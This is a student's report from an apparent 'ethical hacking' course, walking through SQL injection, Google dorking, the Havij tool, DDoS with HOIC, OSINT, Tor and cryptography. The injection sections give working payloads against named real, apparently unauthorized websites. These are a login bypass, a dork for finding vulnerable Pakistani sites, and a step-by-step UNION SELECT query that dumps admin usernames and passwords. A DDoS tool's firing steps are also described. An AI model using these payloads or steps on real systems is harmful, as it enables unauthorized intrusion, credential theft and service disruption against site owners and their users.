Cyber Security and Ethical Hacking

Submitted by Submission date:

Mahadi26 15 February 2020

1
 Table of contents
Serial Name of the content Page
No. number
1. Basic SQL Injection 3

2. Google Dork 5

3 Advance SQL Injection 7

(using Havij)

4 DDoS Attack 14

5 Open Source Intelligence 17

(OSINT)

6 Manual SQL Injection 21

7 Dark web, Deep web and 24

Surface web

8 Cryptography 28

2
It is not that long time since I am with Arena Web Security (AWS). Yes, it is a family we have
had that relation. We are here for a professional ethical hacking course. Simply, I am here for my
passion of hacking and wanted to take it as profession.
After admission process we started our journey on 25 January of 2020. It was an orientation
class. We were kind of new, so were discussed about Basic SQL Injection.

Basic SQL Injection

We know that in a website all data are stored in database. Now for maintenance, modify or other
purpose in database we use a software called Database Management System (DBMS). If we get
the access of the database, we can have any information of the website that the admin of the site
did not want to show us, means the site is hacked.
So, we have understood that we have to capture the access of database. To capture it we do SQL
injection. In a vulnerable website a malicious SQL query is injected as input data, then it is
validated and executed by database. Now the site is ours.
An example for easy understanding; 1’or’1=’1 this is a malicious SQL query. We will inject this
query in a vulnerable website. This is our target website,
http://www.3deducational.co.in/admin/index.php
This is login page of the target site. We will use 1’or’1=’1 as user Id and password like the
picture below.

3
 Fig.01: Log in page Fig.02: SQL query Injection.
This query is validated and executed by database and we have the admin panel.

But there is a question. we have injected in vulnerable website; question is how we can find the
vulnerable site for injection?
For the answer, there comes Google Dork.

4
 Google Dork
At first, we have to know what is vulnerability.
Vulnerability is weakness or safety hole of a system. Having vulnerability of a particular system
means that system has a chance of performing attack somehow. But it does not ensure that is
must be hacked.
There are lots of process to find vulnerable website, but google dork is popular amongst them.
This is advanced search system to find specific information.
Some common operators of google dork are given and described below:
Inurl: By starting this, which URL we write will find out, e.g. inurl:”admin.php” .
Intitle: Title written after this syntax will be found; e.g. intitle:”control panel” .
Intext: Text written after this syntax will be found; e.g. intext:”education” .
Site: specific site will be found; e.g. site:”sourceforce.com” .
Cache: This will show us cache version of any website; e.g. cacahe:”sourceforge.com” .

5
Allintext: It searches for specific text contained on any web page; e.g. allintext:”educational
sites” .
Allinurl: It can be used to fetch results whose URL contains all the specific characters; e.g.
allinurl: client area .
Filetype: It used to search for any kind of file extensions; e.g. filetype: txt .

There are lots of operators. Now let’s check in practical

Here .in is domain of India. Each country has its own domain. From the link of Wikipedia, we
can make a glance there for further more information.
https://en.wikipedia.org/wiki/List_of_Internet_top-level_domains

From those we have some idea about basic SQL injection which is done with a simple SQL
query. We have been introduced with a software which is called Havij.
This is an Advanced SQL injection tool.

6
 Advanced SQL Injection
Havij tool is used for advanced SQL injection.
The process is simple. First, we need to find a vulnerable site, but in this case, it must have a
parameter value in the URL. To this type of website, we have to search using google dork.
Our search operator should be like this:
php?id= site: .pk , here .pk extension for Pakistani website. Search result is given below

7
Now we will enter each site and add a string (‘) operator at the end of the parameter value, then
press enter and observe if any change spotted on the page, if change found then this site is
vulnerable for Advanced SQL injection. Else this is not vulnerable.

At first the webpage was like this

8
But when we add string (‘) then this happens.

Yes, changes. We spotted changes. This means the site is vulnerable for advanced SQL Injection.
Now we will open the Havij tool. At the bar named target we paste the link which we get before
we added string.

9
Now we tap analyze button for analyzing the target.
After Havij analyzed the target, we tap on the table button. And then get tables

10
11
A list has been appeared. We have now access of the site’s server.
Now in that table I will check the admin, because I need admin’s login information. You know
why 😊
After checking the check box of admin we tap on the Get Columns.

Here we get some more lists. These are information of the table→admin. Now I will check
Password and UserName to theirs data. Now tap on Get Data.

This was SQL injection using Havij.

12
These processes are for gaining access of the target site. But what if I want to down a site that no
one can access? Is there any process?
Yes, there is a process of attack. Which is called Distributed Denial of Services (DDoS).

DDoS attack
In this attack the incoming traffic flooding form many different sources potentially hundreds of
thousands or more. This effectively makes it impossible to stop the attack simply by blocking a
single IP address; also, it is very difficult to distinguish legitimate user traffic from attack traffic
when spread across so many points of origin.
There are many types of DDoS attacks. Common attacks include the following:

13
 • Traffic attacks: Traffic flooding attacks send a huge volume of TCP, UDP and ICPM
packets to target. Legitimate requests get lost and these attacks any be accompanied by
malware exploitation.
• Bandwidth attacks: This DDoS attack overloads the target with massive amounts of
junk data. This results in a loss of network bandwidth and equipment resources and can
lead to a complete denial of service.
• Application attacks: Application layer data messages can deplete resources in the
application layer, leaving the targets system services unavailable.

There are many tools to perform DDoS attack, we used High Orbit Ion Cannon (HOIC) to
perform attack.
This is the apps layout

Here at the bottom right corner we see plus and minus two signs. When we want to perform an
attack, we tap on the plus icon and the a new window will come.

14
Target websites URL should be pasted on the URL section and then tap on the FIRE THE
LAZER! This is the way of performing DDoS attack using HOIC.

15
 Open source intelligence (OSINT)
This is the process of analyzing information which are gathered from public. It has various
effective applications. OSINT framework is mostly used by security researchers and penetration
testers for digital footprinting, intelligence gathering and reconnaissance. There are two common
use cases for OSINT:
1. Ethical Hacking and Penetration Testing:
Security professionals use this to identify potential weakness which include:
• Accidental leaks of sensitive information, like through social media.
• Open ports or unsecured internet connected devices.
• Unpatched software, such as websites running old versions of common CMS products.
• Leaked or exposed assets.

2. Identifying External Threats:

Security professionals prioritize their time and resources to address the most significant current
threats e.g.
• In most cases, this type of work requires an analyst to identify and correlate multiple data
points to validate a threat before action is taken. For example, while a single threatening
tweet may not be cause for concern, that same tweet would be viewed in a different light
if it were tied to a threat group known to be active in a specific industry.

16
OSINT techniques is simple. What information we gather from public we try to justify from the
internet. For these justifications the raw element is examined by different tools. These tools are
available online. Some of them are mentioned here
Domain big data, this is used to find who is owner, owners address, owners contact info and
other information’s of the target site.
https://domainbigdata.com/
Useful information of http://www.comillarkagoj.com/ using the domainbigdata site.

If we have a photo and we have to analyze it for any kind of information, hidden logo or message
from the picture, we can use this site for this purpose
https://29a.ch/photo-forensics/?fbclid=IwAR0mu7yRhzogKc0Fntgm6-
VrrYibC414uPZoN7csgTcc9t7ifOuKh_Pc39Y#forensic-magnifier

Sometimes we have to mirror the target image to examine, the we can use this site to mirror the
image

17
https://www5.lunapic.com/editor/?action=mirror&fbclid=IwAR19Cw6SiInGbwcUlzKor5iOMx
XfCFd0NoFmBug1Gk13GYv274rm7UgRcBs

Another important topic related to OSINT is Metadata.

18
 Meta Data
Meta data is data relative to other data. It is summarized information of suspect data by which we
can track or investigate any occurrence. It can take any form like voice conversion, text
messaging or social media communicate data.
Metadata provide a means to classify, organize and characterize data or content. The National
Information Standards Organization (NISO) provides a taxonomy that can be applied to all kinds
of data, from libraries to web sites, for textual and non-textual data, in digitized or material
forms.
NISO describes three types of metadata [1].
• Descriptive metadata:
It includes information such as points of contact, the title or author of a publication, an abstract
of a work, keywords used in a work, a geographic location, or even an explanation of
methodology.
• Structural Metadata:
It explains how a resource is composed or organized. A digitized book, for example can be
published an individual page images, PDF or HTML files.
• Administrative Metadata:
These are usually managing a resource.
To find a picture’s meta data we can go to https://fotoforensics.com/ there we get our required
information.

19
 Manual SQL Injection
This topic is one of the important topics for Hacking. In Havij we did it in automation, here we
will do it by ourselves.
Process is similar like that. First we have find a vulnerable website by Google Dork. When a
vulnerable website found the injection process begins:
Our target site is http://ewe.co.in/career.php?id=1
We know the data is stored in server in row and column. So we have to find the column number
of the data in server.
To do that we can write in two ways.
• Integer Type
• String Type
This is integer Type
The url : http://ewe.co.in/career.php?id=1 order by 1-- .then 2, then3,the 4 and so on; for each
data will show until it says error in web page. The before number of the number it says error is
the number of column.

20
This is string Type
The url : http://ewe.co.in/career.php?id=1’ order by 1--+
Following the process we found that this sites server has 14 tables.

Now to know the vulnerable column; We write.

The url : http://ewe.co.in/career.php?id=-
1'+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+
And press execute.
Now we get some values indication in the web page. Those are vulnerable columns.

Now taking a random column number form shown values. We are taking 8.
To get full data ,we remove 8 and in that place we do→ union base➔Dios mysql➔dios by Zen
wav

21
All has been shown in the site.
To get admin from there we write this
http://ewe.co.in/career.php?id=-
1'+UNION+ALL+SELECT+1,2,group_concat(UserName,0x3d3d,Password),4,5,6,7,8,9,10,11,1
2,13,14 from admin--+
And the data we wanted has been found.

Now we will know about Dark web and Tor Browser.

22
 Dark web, Deep web and Surface web
In everyday life we use internet. We can find almost everything in the internet. We may think
this internet has no limit; it is a huge area. But this regular internet is small portion of actual
internet. This small portion is called surface web.

23
This picture showing the actual situation.
We can surf the surface web with our regular browsers. But how do we surf deep and dark
web??
The answer is Tor Browser. This is browser which has some valuable features [2].
• It does not track its users.
• It hides actual Ip.
• Cross-Platform Availability. i.e., this application is available for Linux, Windows as well
as Mac.
• Complex Data encryption before it sent over the Internet.
• Automatic data decryption at client side.
• It is a combination of Firefox Browser + Tor Project.
• It provides anonymity to servers and websites.
• It makes it possible to visit locked websites.
• Performs task without revealing the IP of Source.
• Capable of routing data to/from hidden services and applications behind the firewall.
• Portable – Run a pre-configured web browser directly from the USB storage device. No
need to install it locally.
• Available for architectures x86 and x86_64.
• Easy to set FTP with Tor using configuration as “socks4a” proxy on “localhost” port
“9050”
• Tor is capable of handling thousands of relay and millions of users.

Web surfing with tor is more like this.

We can see more relays. It has benefits with demerit. Benefit is there are no third party software
like VPN to betray with our information. This is for these extra relays. This slow down the
surfing speed. But if it is a question about security, then TOR is number one.

24
Dark webs links are not like surface web. Dark links are hashed, lots of random number which
cannot be memorized. Here is surface web link providing dark web links.
https://www.thedarkweblinks.com/

If we enter any of these we can see these

25
The red marked words are the links, we just need to copy the link and paste it in the Tor
browser and add .onion extension. Because Tor browser uses this extension.

Now for the security of personal data during communication data should be encrypted
and this method is called Cryptography.

26
 Cryptography

Cryptography refers to secure information and communication techniques derived from

mathematical concepts and a set of rule-based calculations called algorithms to transform
messages in ways that are hard to decipher. These deterministic algorithms are used for
cryptographic key generation and digital signing to protect data privacy, web browsing on the
internet and confidential communications such as credit card transactions and email.
Cryptography is three types [3].
• Symmetric-key:
Encryption algorithms create a fixed length of bits known as a block cipher with a secret key that
the creator uses to encipher data (encryption) and the receiver uses to decipher it. Types of
symmetric-key cryptography include the Advanced Encryption Standard (AES).
• Asymmetric-key:
Encryption algorithm use a pair of keys, a public key associated with the creator for encrypting
messages and a private key that only the originator knows for decrypting that information.
• Hash function:
It returns a deterministic output from an input value, are used to map data to a fixed data size.
Md5 is a cryptography method. To encrypt any data in md5 we can go to this site
http://www.md5-creator.com/

27
To decrypt any md5 encrypted code we can go to this site
https://www.md5online.org/md5-decrypt.html

28
 References

[1] https://gadgetopia.com/post/7881
[2] https://www.tecmint.com/tor-browser-for-anonymous-web-browsing/
[3] https://searchsecurity.techtarget.com/definition/cryptography

29